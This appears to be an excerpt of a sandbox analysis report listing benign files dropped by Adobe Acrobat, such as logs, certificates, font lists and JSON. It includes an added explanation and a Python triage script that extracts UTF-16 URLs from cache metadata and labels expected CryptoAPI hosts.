Preview: *...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type: ASCII text
Category: dropped
Size (bytes): 321
Entropy (8bit): 5.205365324418751
Encrypted: false
SSDEEP: 6:iOZhWp39+q2Pwkn2nKuAl9OmbzNMxIFUtDhwXJZmwVhS2hX9VkwOwkn2nKuAl9Ob:7fm4vYfHAa8jFUttE/rF5JfHAa84J
MD5: A8D870E07A5F332311AE7563AAA80E15
SHA1: 577CB1CB88D3F9A6F6727E766437EA9AA66DF007
SHA-256: AA80A90730E8B999157C0D557A8F2F42A39513989165E6B4ECC59B20341A839C
SHA-512: 6F0C2346EB4BA18684E63065B43962BF6112E38F9A588CAE8469D2AD8DC85B53AB34FB5BEA3E3B9142BBF355419CD51D059F5696DE0A6A65DD866DC6617A3184
Malicious: false
Preview: 2025/01/11-16:53:04.630 ea8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/11-16:53:04.667 ea8 Recovering log #3.2025/01/11-16:53:04.677 ea8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type: ASCII text
Category: dropped
Size (bytes): 321
                                                                                      Entropy (8bit):5.205365324418751
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:iOZhWp39+q2Pwkn2nKuAl9OmbzNMxIFUtDhwXJZmwVhS2hX9VkwOwkn2nKuAl9Ob:7fm4vYfHAa8jFUttE/rF5JfHAa84J
                                                                                      MD5:A8D870E07A5F332311AE7563AAA80E15
                                                                                      SHA1:577CB1CB88D3F9A6F6727E766437EA9AA66DF007
                                                                                      SHA-256:AA80A90730E8B999157C0D557A8F2F42A39513989165E6B4ECC59B20341A839C
                                                                                      SHA-512:6F0C2346EB4BA18684E63065B43962BF6112E38F9A588CAE8469D2AD8DC85B53AB34FB5BEA3E3B9142BBF355419CD51D059F5696DE0A6A65DD866DC6617A3184
                                                                                      Malicious:false
                                                                                      Preview:2025/01/11-16:53:04.630 ea8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/11-16:53:04.667 ea8 Recovering log #3.2025/01/11-16:53:04.677 ea8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
                                                                                      Category:dropped
                                                                                      Size (bytes):71190
                                                                                      Entropy (8bit):0.8418671210517596
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:sUN7PgaFJ8+qGHJMojKfSABQs9CYVM6ZqJ:lN7PgaFJRpM9SQ9ZO6S
                                                                                      MD5:933F69148EC45D9BE56D7063450F1E63
                                                                                      SHA1:DEB748BA75E554DF6DA9A1D89845A4B2F06F7ED5
                                                                                      SHA-256:6F21ED09C2F9482741E3496F85B3505F4732EF58E202AAC13D0C43AED9175074
                                                                                      SHA-512:13961034EF9C7B9BAFBAA607D40B1CFD1B2D260514D480F16929CEC866432C1998BB426DF4A4E3784FCCD958817C7BF727BDC36A3927C40D1F3140FDDD170809
                                                                                      Malicious:false
                                                                                      Preview:BM........6...(...u...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                                      Category:dropped
                                                                                      Size (bytes):86016
                                                                                      Entropy (8bit):4.445059441729332
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:yezci5tIiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:rvs3OazzU89UTTgUL
                                                                                      MD5:ABAC6CA023792DF42D8EE3DB3EB53FA6
                                                                                      SHA1:910D6F65F9C048DDE34636DE2D725531EFD346B8
                                                                                      SHA-256:C98C66251C2EEF7BB582B8FC064CDEC4D313D5523C177F8F35E9180C5DBA8951
                                                                                      SHA-512:F75817C02F73599D4298B380A35A157CEF467778A14ABA69979074496E85C105F17FAEDAE86D8DE18E9D7A0A7738D484ED84A31DD45F2F4299ECCA8FF9456AB0
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:SQLite Rollback Journal
                                                                                      Category:dropped
                                                                                      Size (bytes):8720
                                                                                      Entropy (8bit):3.775089421777971
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:7M6p/E2ioyVuioy9oWoy1Cwoy1+KOioy1noy1AYoy1Wioy1hioybioyMoy1noy1q:7dpjuuFlXKQJAb9IVXEBodRBkD
                                                                                      MD5:D75227495672BEE76D0A3B973168208E
                                                                                      SHA1:709EE0A3AE4570371FE1249536DA7BED8807E41C
                                                                                      SHA-256:BA46C99F98AE6BC5D60390170FE03316BF9DE26E4A90AED06AF55DFF31E57758
                                                                                      SHA-512:0F3471969744D5485A24D6E27FA4B2BB2E88689E3999E7B5CF251629D1FB579C71372FD07247026BE3B94933E809F7A1404D73E1CC76134E29535545AF104185
                                                                                      Malicious:false
                                                                                      Preview:.... .c.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:Certificate, Version=3
                                                                                      Category:dropped
                                                                                      Size (bytes):1391
                                                                                      Entropy (8bit):7.705940075877404
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                      MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                      SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                      SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                      SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                      Malicious:false
                                                                                      Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):71954
                                                                                      Entropy (8bit):7.996617769952133
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                      MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                      SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                      SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                      SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                      Malicious:false
                                                                                      Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):192
                                                                                      Entropy (8bit):2.732136534099206
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:kkFkljUltfllXlE/HT8k5pll7l1NNX8RolJuRdxLlGB9lQRYwpDdt:kK/leT8wp/7VNMa8RdWBwRd
                                                                                      MD5:B6BF8AAF71CBD521930999D405310A3C
                                                                                      SHA1:0B27B477A01E301B0AF9CC0BC1AEEFEDDEE747A0
                                                                                      SHA-256:DC3BECB9106BB55C124DFD030E1CC4608E916B1A2BC0630C7DBF4C715A95EF95
                                                                                      SHA-512:87F30784FB025986BD27145E393D371B7FBC0470E12CD64DA3EE83B3E7583ECE7FA9CBFB5DA1E86F7580175765650A5BC871454C987E4E217F9C6AF8B52CE812
                                                                                      Malicious:false
                                                                                      Preview:p...... ..........5sd..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):328
                                                                                      Entropy (8bit):3.118387027113849
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:kKDGDL9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:bG2DnLNkPlE99SNxAhUe/3
                                                                                      MD5:63B6991337A0B624E5979E0040FC77D3
                                                                                      SHA1:04610AFF032AD801AE45C22BC68FA8BA28D580E5
                                                                                      SHA-256:4798159FD852652F9070571D9A483EB3FD309D402538F0D230E64BE3156A7D39
                                                                                      SHA-512:440A1E4112866811F4913CD2C481F0C6D1E254A80F26749AE8851EBBCBA396CC5F1CB9D080D406328A5532128565D57D55403462DF86233C6E1906B756AAD7DF
                                                                                      Malicious:false
                                                                                      Preview:p...... ........|..Gsd..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
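The two 192- and 328-byte "data" files above carry UTF-16LE URLs (the report's preview renders every NUL byte as a dot): http://x1.i.lencr.org/ with ETag "64cd6654-56f", and http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab with ETag "a7282eb40b1da1:0". Together with the 1391-byte ISRG Root X1 certificate and the authroot.stl cabinet listed just before them, that is the footprint of Windows CryptoAPI fetching an issuer certificate (AIA) and the automatic root update CTL while AcroCEF.exe validates a TLS chain, not a download performed by the sample. The script below is an added example, not Joe Sandbox's code: it pulls UTF-16 URLs out of such blobs and labels hosts CryptoAPI is known to contact. The blob layout it constructs (opaque header, URL, NUL, quoted ETag) is an assumption that reproduces only what the previews show; the two URLs and ETags are the page's own values.

```python
import re
from urllib.parse import urlsplit

# URLs visible in the UTF-16 previews of the two "data" entries above.
CTL_URL = "http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab"
AIA_URL = "http://x1.i.lencr.org/"

# Hosts that Windows CryptoAPI itself contacts while building a certificate chain.
KNOWN_CRYPTOAPI_HOSTS = {
    "ctldl.windowsupdate.com": "Windows automatic root update (authroot CTL download)",
    "x1.i.lencr.org": "Let's Encrypt AIA issuer fetch (serves the ISRG Root X1 certificate)",
}

# A run of at least eight printable ASCII characters encoded as UTF-16LE.
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){8,}")


def build_blob(url: str, etag: str) -> bytes:
    """Constructed stand-in for a cache metadata file (assumption: only the parts
    visible in the previews are reproduced): opaque header, URL as UTF-16LE,
    NUL terminator, then the server's quoted ETag, also UTF-16LE."""
    header = b"p\x00\x00\x00\x00\x00 \x00" + bytes(32)
    return (header + url.encode("utf-16-le") + b"\x00\x00"
            + f'"{etag}"'.encode("utf-16-le") + b"\x00\x00")


def extract_utf16_strings(blob: bytes) -> list:
    """Every printable UTF-16LE run of eight or more characters, decoded."""
    return [m.group().decode("utf-16-le") for m in UTF16_RUN.finditer(blob)]


def extract_urls(blob: bytes) -> list:
    """Only the runs that look like HTTP(S) URLs."""
    return [s for s in extract_utf16_strings(blob)
            if s.lower().startswith(("http://", "https://"))]


def classify(url: str) -> str:
    """Label a URL by host; anything outside the CryptoAPI set deserves a look."""
    host = (urlsplit(url).hostname or "").lower()
    return KNOWN_CRYPTOAPI_HOSTS.get(host, "unrecognised host: review")


def triage_blobs(blobs) -> list:
    """(url, verdict) for every URL found across a set of metadata blobs."""
    return [(url, classify(url)) for blob in blobs for url in extract_urls(blob)]


if __name__ == "__main__":
    samples = [build_blob(AIA_URL, "64cd6654-56f"),
               build_blob(CTL_URL, "a7282eb40b1da1:0")]
    for url, verdict in triage_blobs(samples):
        print(f"{verdict:<70} {url}")
```

Run it over the real metadata files from a sandbox or a disk image and any host that is not a CA, AIA, OCSP or Windows Update endpoint is the one worth pivoting on; the two here are expected CryptoAPI traffic.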
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:PostScript document text
                                                                                      Category:dropped
                                                                                      Size (bytes):1233
                                                                                      Entropy (8bit):5.233980037532449
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                      MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                      SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                      SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                      SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                      Malicious:false
                                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:PostScript document text
                                                                                      Category:dropped
                                                                                      Size (bytes):1233
                                                                                      Entropy (8bit):5.233980037532449
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                      MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                      SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                      SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                      SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                      Malicious:false
                                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:PostScript document text
                                                                                      Category:dropped
                                                                                      Size (bytes):1233
                                                                                      Entropy (8bit):5.233980037532449
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                      MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                      SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                      SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                      SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                      Malicious:false
                                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:PostScript document text
                                                                                      Category:dropped
                                                                                      Size (bytes):10880
                                                                                      Entropy (8bit):5.214360287289079
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                      MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                      SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                      SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                      SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                      Malicious:false
                                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:PostScript document text
                                                                                      Category:dropped
                                                                                      Size (bytes):10880
                                                                                      Entropy (8bit):5.214360287289079
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                      MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                      SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                      SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                      SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                      Malicious:false
                                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):295
                                                                                      Entropy (8bit):5.368778227593046
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXFd+BjJWkVoZcg1vRcR0Y5DoAvJM3g98kUwPeUkwRe9:YvXKXFsqZc0vKsGMbLUkee9
                                                                                      MD5:AF6A619F2B7F59DEA37A2A21323815D0
                                                                                      SHA1:8E22BA53198B4EDA97161A6BFAACAE19EF9AFBE3
                                                                                      SHA-256:F52D5048DFD124D67D574D5FCEAE2A23F114A8BD160F157B014B0A54019F2990
                                                                                      SHA-512:C65E876349E946381C8F4AA7DF0F5388A790D8BAE471DC980D48F61E8F0EE22535895F005FF64C745C5A10653FCCAA1A9A66C10861000F4610603F9A8190392D
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):294
                                                                                      Entropy (8bit):5.3177510003882
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXFd+BjJWkVoZcg1vRcR0Y5DoAvJfBoTfXpnrPeUkwRe9:YvXKXFsqZc0vKsGWTfXcUkee9
                                                                                      MD5:B924963BE3ADF234AD0A8E2FD9E8A68F
                                                                                      SHA1:FAE747E77532670498086C4AB66D76CD843C5A46
                                                                                      SHA-256:0835CFFD10D6E46DC84822D8DE04EB6590E9BD9B6D97A1F43D8E4CAF91E62169
                                                                                      SHA-512:9FDEF813ABFE439B11C4627C8540D07C6E23C14D71ADD7BB2230B8AF4A36ED2BA1D1A5C100773511F81F1D174BAA3A5CA1AC75A75A46E1F0852EAE110116A942
                                                                                      Malicious:false
